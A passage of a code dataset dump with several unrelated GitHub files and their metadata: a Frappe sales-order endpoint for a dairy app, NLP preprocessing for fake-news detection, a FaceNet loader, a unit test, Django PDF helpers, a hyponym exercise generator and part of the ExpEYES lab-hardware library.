asc\")\n\n\n@frappe.whitelist()\ndef make_so(item_list):\n \n customer_name = None\n all_contact_doc_name = frappe.db.get_all(\"Contact\",{\"user\":frappe.session.user},['user','name'])\n for con in all_contact_doc_name:\n # try:\n contact_doc = frappe.get_doc(\"Contact\", con)\n link_table = contact_doc.get('links')\n if(len(link_table) > 0):\n customer_name = link_table[0].get('link_name')\n item_with_all_data = []\n for item in json.loads(item_list):\n if (item.get(\"qty\")):\n if int(item.get('qty')) > 0:\n fetch_details = frappe.db.get_all(\"Website Item\",{\"item_code\" : item.get('item_code')},[\"item_name\", \"item_code\",\"website_image\"])\n print(\"888888888888888888888888888888888888\",fetch_details)\n for i in fetch_details:\n item['item_name'] = i.item_name\n item['website_image'] = i.website_image\n item_with_all_data.append(item)\n\n cache = frappe.cache()\n print(\"************************\",item_with_all_data)\n saor=frappe.db.get_value(\"Sales Order\",{\"name\":cache.get_value(\"so_name\"),\"docstatus\":0,\"delivery_shift\":cache.get_value(\"delivery_shift\").title() if cache.get_value(\"delivery_shift\") else \"Morning\"},\"name\")\n if not saor:\n so = frappe.new_doc(\"Sales Order\")\n so.company = frappe.db.sql(\"select name from `tabCompany`;\")[0][0]\n # get_price_list = frappe.db.get_single_value(\"Bulk Order Settings\", \"price_list\")\n # if not get_price_list:\n # frappe.throw('Please select price list in Bulk Order Settings')\n so.customer = customer_name\n cache.set_value('customer_name', customer_name)\n f=frappe.get_doc(\"Customer\", so.customer )\n print(\"uuuuuuuuuuuuuuuuuuuuuuuu\",f)\n so.price_list=f.default_price_list\n # so.price_list = get_price_list\n so.order_type = \"Shopping Cart\"\n so.transaction_date = frappe.utils.nowdate()\n del_date = None\n del_date = cache.get_value(\"del_date\")\n if not del_date:\n del_date = frappe.utils.nowdate()\n so.delivery_date=del_date\n item_rate=0\n if cache.get_value(\"delivery_shift\"):\n delivery_shift = cache.get_value(\"delivery_shift\").title()\n\n else:\n delivery_shift=\"Morning\"\n so.delivery_shift=delivery_shift\n website_warehouse = frappe.db.get_single_value(\"Bulk Order Settings\", 'default_warehouse')\n print(\"item******************************\",json.loads(item_list))\n for data in json.loads(item_list):\n print(\"89999999999999999999111111\",data)\n if (data.get(\"qty\")):\n if(int(data.get(\"qty\")) > 0):\n if not website_warehouse:\n m = \"warehouse not found for item {0}
please set default warehouse in bulk order settings \".format(data.get(\"item_code\"))\n msg = {\n 'status': False,\n 'msg': m\n }\n return msg\n \n # get_price_list = frappe.db.get_single_value(\"Bulk Order Settings\", 'price_list')\n \n item_rate = frappe.db.get_value(\"Item Price\", {'item_code':data.get('item_code'),'price_list': f.default_price_list} , \"price_list_rate\")\n \n item = {\n \"item_code\" : data.get(\"item_code\"),\n \"delivery_date\" : del_date,\n \"qty\" : data.get(\"qty\"),\n \"rate\" : item_rate,\n \"conversion_rate\":1,\n \"stock_qty\":flt(data.get(\"qty\"))*1,\n \"uom\":data.get(\"uom\"),\n \"warehouse\" : website_warehouse\n }\n so.append(\"items\", item)\n try:\n so.insert(ignore_permissions=True)\n cache.set_value('so_name', so.name)\n # print(\"$$$$$$$$$$$$$$$$$$$$$$$$$$\",item_with_all_data)\n for item in so.items:\n a=0\n for i in item_with_all_data:\n if (i.get('item_code') == item.get('item_code')) and a==0:\n a=1\n doc=frappe.get_doc(\"Item\",i.get('item_code'))\n item.uom=doc.stock_uom\n i['rate'] = item.get('rate')\n i['amount'] = item.get('amount')\n i['uom']= doc.stock_uom\n so.save(ignore_permissions=True)\n print(\"$$$$$$$$55555666666666666666\",item_with_all_data)\n cache.set_value('item_list', item_with_all_data)\n cache.set_value('rounded_up_total', so.rounded_total)\n cache.set_value('rounding_adjustment', so.rounding_adjustment)\n cache.set_value('total_amount', so.grand_total)\n cache.set_value('default_cust_add', so.customer_address)\n cache.set_value('default_ship_add', so.shipping_address_name)\n\n\n\n return {\n 'status': True,\n 'so_name': so.name\n }\n except:\n return False\n \n else:\n sal_ord=frappe.get_doc(\"Sales Order\",saor)\n print(\"5555555555555555222222222222\",sal_ord)\n sal_ord.company = frappe.db.sql(\"select name from `tabCompany`;\")[0][0]\n # get_price_list = frappe.db.get_single_value(\"Bulk Order Settings\", \"price_list\")\n # if not get_price_list:\n # frappe.throw('Please select price list in Bulk Order Settings')\n sal_ord.customer = customer_name\n print(\"uuuuuuuuut666666666666666666666667\",customer_name)\n cache.set_value('customer_name', customer_name)\n f=frappe.get_doc(\"Customer\", sal_ord.customer )\n print(\"7777777777777777777777777777777777\",f)\n sal_ord.price_list=f.default_price_list\n # so.price_list = get_price_list\n sal_ord.order_type = \"Shopping Cart\"\n sal_ord.transaction_date = frappe.utils.nowdate()\n del_date = None\n del_date = cache.get_value(\"del_date\")\n if not del_date:\n del_date = frappe.utils.nowdate()\n print(\"8888888888888888888888888888888888\",del_date)\n sal_ord.delivery_date=del_date\n item_rate=0\n if cache.get_value(\"delivery_shift\"):\n delivery_shift = cache.get_value(\"delivery_shift\").title()\n\n else:\n delivery_shift=\"Morning\"\n sal_ord.delivery_shift=delivery_shift\n website_warehouse = frappe.db.get_single_value(\"Bulk Order Settings\", 'default_warehouse')\n for data in json.loads(item_list):\n print(\"2111111111111111111111111111\",data)\n if (data.get(\"qty\")):\n if(int(data.get(\"qty\")) > 0):\n if not website_warehouse:\n m = \"warehouse not found for item {0}
please set default warehouse in bulk order settings \".format(data.get(\"item_code\"))\n msg = {\n 'status': False,\n 'msg': m\n }\n return msg\n \n # get_price_list = frappe.db.get_single_value(\"Bulk Order Settings\", 'price_list')\n \n item_rate = frappe.db.get_value(\"Item Price\", {'item_code':data.get('item_code'),'price_list': f.default_price_list} , \"price_list_rate\")\n k=[]\n for j in sal_ord.items:\n k.append(j.item_code)\n for j in sal_ord.items:\n if j.item_code==data.get(\"item_code\"):\n j.qty= data.get(\"qty\")\n\n j.rate=item_rate\n else:\n if data.get(\"item_code\") not in k:\n item = {\n \"item_code\" : data.get(\"item_code\"),\n \"delivery_date\" : del_date,\n \"qty\" : data.get(\"qty\"),\n \"rate\" : item_rate,\n \"conversion_rate\":1,\n \"uom\":data.get(\"uom\"),\n \"stock_qty\":flt(data.get(\"qty\"))*1,\n \"warehouse\" : website_warehouse\n }\n sal_ord.append(\"items\", item)\n print(\"88888888888888832\",item)\n try:\n sal_ord.save(ignore_permissions=True)\n cache.set_value('so_name', sal_ord.name)\n for item in sal_ord.items:\n a=0\n for i in item_with_all_data:\n if (i.get('item_code') == item.get('item_code')) and a==0:\n a=1\n doc=frappe.get_doc(\"Item\",i.get('item_code'))\n item.uom=doc.stock_uom\n i['rate'] = item.get('rate')\n i['amount'] = item.get('amount')\n i['uom'] = doc.stock_uom\n so.save(ignore_permissions=True)\n\n cache.set_value('item_list', item_with_all_data)\n cache.set_value('rounded_up_total', sal_ord.rounded_total)\n cache.set_value('rounding_adjustment', sal_ord.rounding_adjustment)\n cache.set_value('total_amount', sal_ord.grand_total)\n cache.set_value('default_cust_add', sal_ord.customer_address)\n cache.set_value('default_ship_add', sal_ord.shipping_address_name)\n\n\n return {\n 'status': True,\n 'so_name': sal_ord.name\n }\n except:\n return False\n\n@frappe.whitelist()\ndef handle_date(date):\n frappe.cache().set_value(\"del_date\", date)\n\n@frappe.whitelist()\ndef handle_shift(shift):\n frappe.cache().set_value(\"delivery_shift\",shift) \n return shift\n\n \n\n","repo_name":"Pradip2113/dairy","sub_path":"dairy/www/bulk_order.py","file_name":"bulk_order.py","file_ext":"py","file_size_in_byte":10365,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"15616136301","text":"import csv\nimport nltk\nimport numpy as np\n\nfrom nltk.corpus import stopwords\nfrom gensim.models import Word2Vec\nfrom sklearn.feature_extraction.text import CountVectorizer\n\n\ndef get_duration(st, et):\n minutes = int((et - st) / 60)\n seconds = (et - st) % 60\n duration = f\"{minutes} min {seconds:.2f} sec\"\n return duration\n\n\ndef check_periods(full_text):\n checked_text = []\n for char in full_text:\n if char in ['.', ',', ':', ';']:\n char = char + \" \"\n checked_text.append(char)\n return \"\".join(checked_text)\n\n\ndef preprocess_line(line):\n sent_tokens = [word.casefold() for word in nltk.tokenize.word_tokenize(line)]\n processed_tokens = []\n for word in sent_tokens:\n if word.isalpha():\n processed_tokens.append(word)\n elif word.isnumeric():\n processed_tokens.append(\"\")\n return processed_tokens\n\n\ndef preprocess(text):\n all_lines = []\n all_tokens = []\n for line in nltk.tokenize.sent_tokenize(text):\n all_lines.append(line)\n processed_tokens = preprocess_line(line)\n all_tokens.append(processed_tokens)\n return all_lines, all_tokens\n\n\ndef get_all_texts(fraction=1):\n all_titles = []\n all_texts = []\n all_proc_texts = []\n true_or_fake = []\n with open(\"data/Fake.csv\", \"r\") as csvfile:\n for row in csv.reader(csvfile):\n title, text, _, _ = row\n text = check_periods(text)\n all_titles.append(title)\n all_texts.append(text)\n all_proc_texts.append(preprocess(text))\n true_or_fake.append(1)\n with open(\"data/True.csv\", \"r\") as csvfile:\n for row in csv.reader(csvfile):\n title, text, _, _ = row\n text = check_periods(text)\n all_titles.append(title)\n all_texts.append(text)\n all_proc_texts.append(preprocess(text))\n true_or_fake.append(0)\n return all_titles, all_texts, all_proc_texts, true_or_fake\n\n\ndef get_clusters():\n clusters = []\n with open(\"data/clusters.txt\", \"r\") as source:\n for line in source:\n clusters.append(int(line.rstrip()))\n return clusters\n\n\ndef get_word_embedding(word, model):\n sw = stopwords.words('english')\n try:\n word_emb = model.wv[word]\n except:\n word_emb = 0\n if word in sw:\n word_emb = word_emb * 0.5\n return word_emb\n\n\ndef get_sent_embedding(sent_tokens, model):\n sent_embedding = np.zeros([100,])\n for word in sent_tokens:\n tok_emb = get_word_embedding(word, model=model)\n sent_embedding += tok_emb\n return sent_embedding\n\n\ndef get_text_embedding(prep_text, model):\n text_embedding = np.zeros([100,])\n for sent in prep_text:\n sent_emb = get_sent_embedding(sent, model=model)\n text_embedding += sent_emb\n return text_embedding\n\n\ndef get_bow(texts_list, sw=\"english\"):\n return CountVectorizer(stop_words=sw).fit_transform(texts_list).toarray()\n","repo_name":"mgrafu/CUNY-AI-FakeNews","sub_path":"preprocess.py","file_name":"preprocess.py","file_ext":"py","file_size_in_byte":2973,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"20903086600","text":"from facenet.src import facenet\nimport tensorflow as tf\nfrom app.domain.face.align import detect_face\n\n\ndef getModel():\n sess = tf.Session()\n # read pnet, rnet, onet models from align directory and files are det1.npy, det2.npy, det3.npy\n pnet, rnet, onet = detect_face.create_mtcnn(sess, 'app/models/align')\n\n # read 20170512-110547 model file downloaded from https://drive.google.com/file/d/0B5MzpY9kBtDVZ2RpVDYwWmxoSUk\n facenet.load_model(\"app/models/model/tfmodel.pb\")\n\n # Get input and output tensors\n images_placeholder = tf.get_default_graph().get_tensor_by_name(\"input:0\")\n embeddings = tf.get_default_graph().get_tensor_by_name(\"embeddings:0\")\n phase_train_placeholder = tf.get_default_graph().get_tensor_by_name(\"phase_train:0\")\n\n return (sess, pnet, rnet, onet,images_placeholder, embeddings, phase_train_placeholder )","repo_name":"italojs/flask-face-similarity","sub_path":"app/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":858,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"2927871589","text":"import unittest\nimport l370b\n\n\nclass testSolution(unittest.TestCase):\n\n def setUp(self):\n self.s = l370b.Solution()\n\n #@unittest.skip(\"wait\")\n def test_solution(self):\n words = [\"area\",\"lead\",\"wall\",\"lady\",\"ball\"]\n expected = [\n [ \"wall\",\n \"area\",\n \"lead\",\n \"lady\"\n ],\n [ \"ball\",\n \"area\",\n \"lead\",\n \"lady\"\n ]\n ]\n got = self.s.wordSquares(words)\n self.assertItemsEqual(got, expected)\n #import pdb;pdb.set_trace()\n words = [\"abat\",\"baba\",\"atan\",\"atal\"]\n expected = [\n [ \"baba\",\n \"abat\",\n \"baba\",\n \"atan\"\n ],\n [ \"baba\",\n \"abat\",\n \"baba\",\n \"atal\"\n ]\n ]\n got = self.s.wordSquares(words)\n self.assertItemsEqual(got, expected)\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","repo_name":"SolbiatiAlessandro/pyComPro","sub_path":"leetcode/google/370/test_370b.py","file_name":"test_370b.py","file_ext":"py","file_size_in_byte":966,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"18"} +{"seq_id":"29707451224","text":"from django.http import HttpResponse\nfrom django.template.loader import render_to_string\nfrom django.utils.http import urlquote\nfrom weasyprint import HTML\n\n\ndef encode_filename(filename):\n \"\"\"\n Encodes filename part for ``Content-Disposition: attachment``.\n\n filename=\"abc.pdf\" => filename=abc.pdf\n filename=\"aa bb.pdf\" => filename*=UTF-8''aa%20bb.pdf\n filename=u\"zażółć.pdf\" => filename*=UTF-8''za%C5%BC%C3%B3%C5%82%C4%87.pdf\n \"\"\"\n\n quoted = urlquote(filename)\n if quoted == filename:\n return \"filename=%s\" % filename\n else:\n return \"filename*=UTF-8''%s\" % quoted\n\n\ndef make_response(content, filename=None, content_type=\"application/pdf\"):\n \"\"\"\n Wraps content into HTTP response.\n\n If ``filename`` is specified then ``Content-Disposition: attachment``\n header is added to the response.\n\n Default ``Content-Type`` is ``application/pdf``.\n\n :param bytes content: response content\n :param str filename: optional filename for file download\n :param str content_type: response content type\n :rtype: :class:`django.http.HttpResponse`\n \"\"\"\n response = HttpResponse(content, content_type=content_type)\n if filename is not None:\n response[\"Content-Disposition\"] = \"attachment; {}\".format(\n encode_filename(filename)\n )\n return response\n\n\ndef render_to_pdf(request, template, context, base_url=None, filename=None, stylesheets=None):\n return make_response(\n content=HTML(\n string=render_to_string(\n request=request,\n template_name=template,\n context=context\n ),\n base_url=base_url or request.build_absolute_uri()\n ).write_pdf(stylesheets=stylesheets),\n filename=filename\n )","repo_name":"velafrica/velafrica-django","sub_path":"velafrica/core/pdf_utils.py","file_name":"pdf_utils.py","file_ext":"py","file_size_in_byte":1779,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"72456072679","text":"import procesamientos.oraciones as orac\nimport procesamientos.hiponimos as hip\nfrom recursos.categorias import Categorias\nfrom procesamientos.sustantivos import es_sustantivo\nfrom procesamientos.procesamiento import obtener_palabras, es_adjetivo\nimport nltk\nfrom pattern.en import lemma\n\nclass ItemEjercicioHiponimos():\n\n def __init__(self, palabra, categoria):\n self.palabra = palabra\n self.categoria = categoria\n\nclass EjercicioHiponimos():\n def __init__(self, parrafo, ejercicio = None):\n self.parrafo = parrafo\n self.numeros_siguientes = []\n if not ejercicio:\n self.items = self.procesar_ejercicio_hiponimos(parrafo)\n else:\n self.items = ejercicio\n\n def procesar_ejercicio_hiponimos(self, texto):\n items_ejercicio = []\n filtro = lambda x: es_sustantivo(x) or es_adjetivo(x)\n lista_palabras = obtener_palabras(filtro, texto)\n\n lista_palabras = list({ each['token'] : each for each in lista_palabras }.values())\n for palabra in lista_palabras:\n palabra_token = lemma(palabra['token'])\n categorias = Categorias().listar_categorias()\n palabra_categoria = None\n for categoria in categorias:\n categoria_synset_id = categoria['synset_id']\n es_hiponimo = hip.es_hiponimo(palabra_token, categoria_synset_id)\n if es_hiponimo:\n palabra_categoria = categoria['nombre']\n if palabra_categoria:\n # Evitar palabras duplicadas\n if not any(obj.palabra == palabra_token for obj in items_ejercicio):\n item = ItemEjercicioHiponimos(palabra_token, palabra_categoria)\n items_ejercicio.append(item)\n return items_ejercicio\n\n def eliminar_item(self, palabra):\n self.items = list(filter(lambda x: x.palabra != palabra, self.items))\n\n def exportar_ejercicio(self):\n opciones = []\n for item in self.items:\n opcion = {\n 'palabra': item.palabra,\n 'categoria': item.categoria\n }\n opciones.append(opcion)\n categorias = [cat['nombre'] for cat in Categorias().listar_categorias()]\n ejercicio = {\n 'texto_original': self.parrafo,\n 'opciones': opciones,\n 'categorias': categorias,\n 'tipo': 'hiponimos'\n }\n return ejercicio\n","repo_name":"joacolej/proygrado","sub_path":"src/ejercicios/ejercicio_hiponimos.py","file_name":"ejercicio_hiponimos.py","file_ext":"py","file_size_in_byte":2455,"program_lang":"python","lang":"es","doc_type":"code","stars":3,"dataset":"github-code","pt":"18"} +{"seq_id":"22097182886","text":"'''\nEYES for Young Engineers and Scientists (EYES 1.0)\nPython library to communicate to the AtMega32 uC running 'eyes.c'\nAuthor : Ajith Kumar B.P, bpajith@gmail.com\nLicense : GNU GPL version 3\nStarted on 1-Nov-2010\nLast Edit : 13-Oct-2011 : Added MCP2200 support (for version 2)\nLast Edit : 4-Nov-2011 : DAC maximum set to 5.000 volts\n\n\nThe hardware consisists of :\n1) 2 Digital Inputs\n2) 2 Digital Outputs\n3) 2 DAC channels\n4) 8 ADC channels (only 6 used)\n 0,1 : -5V to 5V inputs\n 2 : 0 to 5V input\n\n5) 1 Square wave generator using ATmega32\n6) 1 Square wave generator using IC555 (frequency range selectable through Atmega32)\n7) 1 Pulse Width Modulator Output using ATmega32\n8) A 100 Hz sine wave generator, bipolar\n9) 1 Current source controlled by DAC channel 1\n10)1 Non-Inverting Amplifier using OP27, gain can be set by an external resistor\n11)1 Inverting amplifier, gain can be selected using a series resistance at the input\n12)2 Inverting amplifiers with gain = 47 , mainly used for microphones. \n'''\nfrom __future__ import print_function\n\nfrom subprocess import run\nimport serial, struct, math, time, sys, os, glob, fnmatch\n\nimport gettext\ngettext.bindtextdomain(\"expeyes\")\ngettext.textdomain('expeyes')\n_ = gettext.gettext\n\n\n#Commands with One byte argument (41 to 80) \nGETVERSION = 1\nDIGIN = 2 # Digital Input (4 bits)\nUSOUND = 3 # Pulse OD1 to get rising edge on ID2(internal)\n\n#Commands with One byte argument (41 to 80) \nSETSAMTIME = 41 # MCP3208 sampling duration\nSETADCSIZE = 42\nREADADC = 43 #Read the specified ADC channel\nR2FTIME = 44 # Rise to Fall of signal on input pins\nR2RTIME = 45 # Rise to Fall of signal on input pins\nF2RTIME = 46 # Fall to Rise of signal on input pins\nF2FTIME = 47 # Fall to Rise of signal on input pins\nSET2RTIME = 48 # Setting of bit to rising edge\nSET2FTIME = 49 # to falling time\nCLR2RTIME = 50 # Setting of bit to rising edge\nCLR2FTIME = 51 # to falling time\nPULSE2RTIME = 52 # Pulse to rising edge\nPULSE2FTIME = 53 # Pulse to rising edge\nSETPULSEWID = 54 # width for PULSE2 functions (0 to 250)\nSETPULSEPOL = 55 # PULSE polarity (0 for HIGH true)\nDIGOUT = 56 # Digital output (4 bits)\nADC2CMP = 57 # Route ADC input to ACOMP-\nSETPWM = 58 # Set 488 Hz PWM wave on TC0\nSETPWMDAC = 59 # Set 31.25 kHz PWM wave on TC0\nGETPORT = 60 # PINX data from port X\nIRSEND = 61 # Send 8 bit data on SQR1, using infrared LED\n\n# Commands with Two bytes argument (81 to 120)\nSETPWM0 = 81 # PWM on on OSC0\nSETCOUNTER0 = 82 # Square wave on OSC0\nSETCOUNTER2 = 83 # Square wave on OSC2\nSETACTION = 84 # Capture Actions of SET/CLR type\nMULTIR2R = 85 # Rising edge to a rising edge after N cycles\nADCTRIGS = 86 # Trigger levels for read_block functions\nSETWAVEFORM = 87 # ISR Wavegen. OCR0 and which DAC from the caller\nPULSE_D0D1 = 88 # Interrupt driven square wave on D0 and D1\nSETDDR = 90 # DDRX = dirmask (arg1 = X, arg2 = mask)\nSETPORT = 91 # PORTX = DATA (arg1 = X, arg2 = DATA)\n\n# Commands with Three bytes argument (121 to 160) \nSETDAC = 121 # Serial DAC: send ch, dlo & dhi\nQCAPTURE01 = 122 # 2 bytes N, 1 byte dt. captures channel 0 and 1\nWREEPROM = 123 # Write EEPROM , 2 byte addr & 1 byte data\nRDEEPROM = 124 # Read EEPROM , 2 byte addr , 1 byte nb\n\n#Commands with Four bytes argument (161 to 200)\nCAPTURE01 = 161 # 2 bytes N, 2 bytes dt. Capture channel 0 and 1\nQCAPTURE = 162 # Ch, 2 byte N, 1 byte dt.\n\n#Commands with Five bytes argument (201 to 240)\nCAPTURE = 201 # Ch, 2 byte N, 2 byte dt. Capture from MCP3208 ADC\nCAPTURE_M32 = 202 # Ch, 2 byte N, 2 byte dt. Capture from ATmega32 ADC\n\n# Actions before capturing waveforms\nASET = 1\nACLR = 2\nAPULSEHI = 3\nAPULSELO = 4\nAWAITHI = 5\nAWAITLO = 6\nAWAITRISE = 7\nAWAITFALL = 8\n\nBUFSIZE = 1800 # status + adcinfo + 1800 data\n\n#Serial devices to search for EYES hardware. \nlinux_list = ['/dev/ttyUSB0', '/dev/ttyUSB1', '/dev/ttyUSB2',\n '/dev/ttyACM0','/dev/ttyACM1','/dev/ttyACM2',\n '/dev/cu.usbserial']\n\n\ndef open(dev = None):\n '''\n If EYES hardware in found, returns an instance of 'Eyes', else returns None.\n '''\n obj = Eyes()\n if obj.fd != None:\n obj.disable_actions()\n return obj\n print (_('Could not find Phoenix-EYES hardware'))\n print (_('Check the connections.'))\n\nDACMAX = 5.000 # MCP4922 DAC goes only up to 4.933 volts, in version 1\nBAUDRATE = 38400 # Serial communication\n\nclass Eyes:\n fd = None # init should fill this\n adcsize = 1\n m = [10.0/4095]*2 + [5.0/4095]*6 + [4095./DACMAX/2, 4095.0/DACMAX] # 8th and 9th are for DAC\n c = [-5.0]*2 + [0.0]*6 + [4095.0/2, 0]\n msg = '.'\n\n def __init__(self, dev = None):\n \"\"\"\n Searches for EYES hardware on RS232 ports and the USB-to-Serial adapters. Presence of the\n device is done by reading the version string.\n The timeout at Python end is set to 3.2 milliseconds, twice the minimum 555 output time period.\n TODO : Supporting more than one EYES on a PC to be done. The question is how to find out\n whether a port is already open or not, without doing any transactions to it.\n \"\"\"\n self.adcsize = 2;\n\n if os.name == 'nt':\n device_list = []\n for k in range(1,255):\n s = 'COM%d'%k\n device_list.append(s)\n for k in range(1,11):\n device_list.append(k)\n elif (os.uname()[0] == 'Darwin'):\n device_list = []\n device_list = glob.glob('/dev/cu.usbserial*')\n else:\n device_list = [] # gather unused ones from the linux_list\n for dev in linux_list:\n cp = run('lsof -t '+ str(dev), shell=True,\n capture_output=True, encoding=\"utf-8\")\n res = cp.stdout\n if res == '':\n device_list.append(dev)\n\n for dev in device_list:\n try:\n handle = serial.Serial(dev, BAUDRATE, stopbits=1, timeout = 0.3, parity=serial.PARITY_EVEN)\n except:\n continue\n print (_('Port %s is existing ')%dev,)\n if handle.isOpen() != True:\n print (_('but could not open'))\n continue\n print (_('and opened. '),)\n handle.flush()\n time.sleep(.5)\n while handle.inWaiting() > 0 :\n handle.flushInput()\n handle.write(chr(GETVERSION))\n res = handle.read(1)\n ver = handle.read(5) # 5 character version number\n if ver[:2] == 'ey':\n self.device = dev\n self.fd = handle\n self.version = ver\n handle.timeout = 4.0 # r2rtime on .7 Hz require this\n print (_('Found EYES version '),ver)\n return\n else:\n print (_('No EYES hardware detected'))\n self.fd = None\n#------------------------------------------------------------------------------------\n\n def dwrite(self,ch):\n self.fd.write(ch)\n time.sleep(0.01) #MCP2200 to ATmega transfer has no handshake\n\n#-------------------- Pulse Width Modulated Waveform on TC0 and TC2 ------------------\n def set_pwmdac(self, vout): # Value in 0 to 5V\n '''\n Sets the PULSE output (T10) to 31.25 kHz and sets the duty cycle to make the\n average voltage = vout. Need External RC filter to use this as a DC output.\n 0 to 5V range is covered in 255 steps and the function returns the value set.\n '''\n if 0 <= vout <= 5.0:\n val = int(vout*255.0/5.0)\n self.dwrite(chr(SETPWMDAC))\n self.dwrite(chr(val))\n self.fd.read(1)\n return val * 5.0 / 255\n\n def set_pulse(self, ds): # Dutycycle in percentage\n '''\n Sets the frequency on PULSE to 488.3 Hz. Dutycycle is set to 'ds'.\n Returns the actual value set.\n '''\n if 0 <= ds <= 100:\n val = int(ds*255.0/100)\n self.dwrite(chr(SETPWM))\n self.dwrite(chr(val))\n self.fd.read(1)\n return val * 100.0 / 255\n\n#---------------- Square Wave Generation & Measuring the Frequency ------------------\n def irsend(self, dat): # Infrared transmission\n self.dwrite(chr(IRSEND))\n self.dwrite(chr(dat))\n self.fd.read(1)\n\n def set_sqr0(self, freq): # Sets Squarewave on the PULSE output\n '''\n Sets a square wave on the PULSE output. Frequency from 15Hz to 40000000 Hz (4 MHz), but\n it is not possible to set all intermediate values.\n The function sets the nearest possible value and returns it.\n '''\n if freq < 1: # Disable squarewave on PULSE\n self.dwrite(chr(SETCOUNTER0))\n self.dwrite(chr(0))\n self.dwrite(chr(0))\n self.fd.read(1)\n return 0\n\n div = [4000000.0, 500000.0, 125000.0, 62500.0, 31250.0,15625.0,3906.25]\n for i in range(7):\n clock_sel = i+1\n freq0 = div[i]\n if ( freq0/ freq) <= 256:\n break\n setpoint = freq0/freq\n if setpoint > 255:\n setpoint = 255\n OCR0 = int(setpoint)-1\n #print (clock_sel, OCR2)\n self.dwrite(chr(SETCOUNTER0))\n self.dwrite(chr(clock_sel))\n self.dwrite(chr(OCR0))\n res = self.fd.read(1)\n if res != 'D':\n return None\n if setpoint == 0:\n return freq0\n else:\n return freq0/(OCR0+1)\n\n def set_sqr1(self, freq): # Freq in Hertz\n '''\n Sets the output frequency of the SQR1. Ranges from 15Hz to 40000000 Hz (4 MHz), but\n it is not possible to set all intermediate values.\n The function sets the nearest possible value and returns it.\n '''\n if freq < 1: # Disable PWG\n self.dwrite(chr(SETCOUNTER2))\n self.dwrite(chr(0))\n self.dwrite(chr(0))\n self.fd.read(1)\n return 0\n\n div = [4000000.0, 500000.0, 125000.0, 62500.0, 31250.0,15625.0,3906.25]\n for i in range(7):\n clock_sel = i+1\n freq0 = div[i]\n if ( freq0/ freq) <= 256:\n break\n setpoint = freq0/freq\n if setpoint > 255:\n setpoint = 255\n OCR2 = int(setpoint)-1\n #print (clock_sel, OCR2)\n self.dwrite(chr(SETCOUNTER2))\n self.dwrite(chr(clock_sel))\n self.dwrite(chr(OCR2))\n res = self.fd.read(1)\n if res != 'D':\n return None\n if setpoint == 0:\n return freq0\n else:\n return freq0/(OCR2+1)\n\n def get_sqr1(self):\n '''\n This function measures the frequency of SQR1. There is no need of this\n since set_sqr1 returns the frequency actually set.\n '''\n self.adc2cmp(6)\n t = self.multi_r2rtime(4)\n if t < 10000:\n t = self.multi_r2rtime(4,9)\n return 1.0e7/t\n return 1.0e6 / t\n\n def set_sqr2(self, fmax):\n '''\n This function sets the frequency range of SQR2.\n The ranges are : 0.7 to 25, 25 to 1000, 1000 to 10000 and 10000 to 90000.\n You need to adjust the 22 KOhm variable resistor to get the desired frequency\n within the selected range. Software allows you to measure the frequency while\n adjusting the resistor. Frequency can be set from .7 Hz to 90 KHz in different ranges.\n '''\n if fmax < 0: #PA0 to LOW, makes 555 output LOW\n self.set_ddr(0,1)\n self.set_port(0,1)\n elif fmax == 0: #PA0 to LOW, makes 555 output HIGH\n self.set_ddr(0,1)\n self.set_port(0,0)\n elif fmax<= 25:\n self.set_ddr(0, 2+4+8+16) # connect (47 + 1 + 0.1 + 0.01) uF\n self.set_port(0,0)\n elif fmax<= 1000:\n self.set_ddr(0, 2+4+8) # connect (1 + 0.1 + 0.01) uF\n self.set_port(0,0)\n elif fmax<= 10000:\n self.set_ddr(0, 2+4) # connect (0.1 + 0.01) uF\n self.set_port(0,0)\n elif fmax <= 90000: # connect 0.01 uF\n self.set_ddr(0, 2)\n self.set_port(0,0)\n elif fmax > 300000: # Oscllate with stray capacitance only\n self.set_ddr(0, 0)\n self.set_port(0,0)\n\n def get_sqr2(self):\n '''\n This function measures the frequency of SQR2 (555 oscillator).\n Call this while adjusting the frequency using the variable resistor.\n '''\n self.adc2cmp(6)\n t = self.multi_r2rtime(4)\n if t < 0:\n return t\n if 0 < t < 10000:\n t = self.multi_r2rtime(4,9)\n return 1.0e7/t\n return 1.0e6 / t\n\n def sensor_frequency(self):\n '''\n This function measures the frequency on the signal on SENS (T23) input.\n '''\n self.adc2cmp(5)\n t = self.multi_r2rtime(4)\n if t < 0:\n return t\n if 0 < t < 10000:\n t = self.multi_r2rtime(4,9)\n return 1.0e7/t\n return 1.0e6 / t\n\n def ampin_frequency(self):\n '''\n This function measures the frequency of an external BIPOLAR signal connected to Terminal 15.\n If your signal is unipolar , connect it through a 1uF series\n The amplitude must be more than 100 mV\n '''\n return self.digin_frequency(2) # Amplifier output is connected to PC2\n\n def digin_frequency(self, pin):\n '''\n This function measures the frequency of an external 0 to 5V PULSE on digital inputs.\n '''\n t = self.multi_r2rtime(pin)\n if t < 0:\n return t\n if 0 < t < 10000:\n t = self.multi_r2rtime(pin,9)\n return 1.0e7/t\n return 1.0e6 / t\n\n#-------------------------------------- ADC & DAC Calibrations -----------------------------\n def eeprom_write_char(self,addr, dat):\n '''\n Writes one byte to the specified address of the EEPROM memory of ATmega32.\n Used for storing the calibration constants of ADC and DAC.\n WARNING: Using this function may destroy the Calibration Data.\n '''\n self.dwrite(chr(WREEPROM))\n self.dwrite(chr(addr&255))\n self.dwrite(chr(addr>>8))\n self.dwrite(dat)\n res = self.fd.read(1)\n if res != 'D':\n print (_('eeprom write byte error = '), res)\n\n def eeprom_read_block(self, addr, nb): # get nb bytes starting from addr\n '''\n Reads 'nb' bytes starting from the specified address of the EEPROM memory of ATmega32.\n Used for restoring the calibration constants of ADC and DAC.\n '''\n self.dwrite(chr(RDEEPROM))\n self.dwrite(chr(addr&255))\n self.dwrite(chr(addr>>8))\n self.dwrite(chr(nb))\n res = self.fd.read(1)\n if res != 'D':\n print (_('eeprom read block error = '), res)\n dat = self.fd.read(nb)\n return dat\n\n def save_calib(self, ch, m, c): # Saves m & c (8 bytes) to addr ch*8\n '''\n It is possible to reduce the offset and gain errors of the ADC, DAC and the 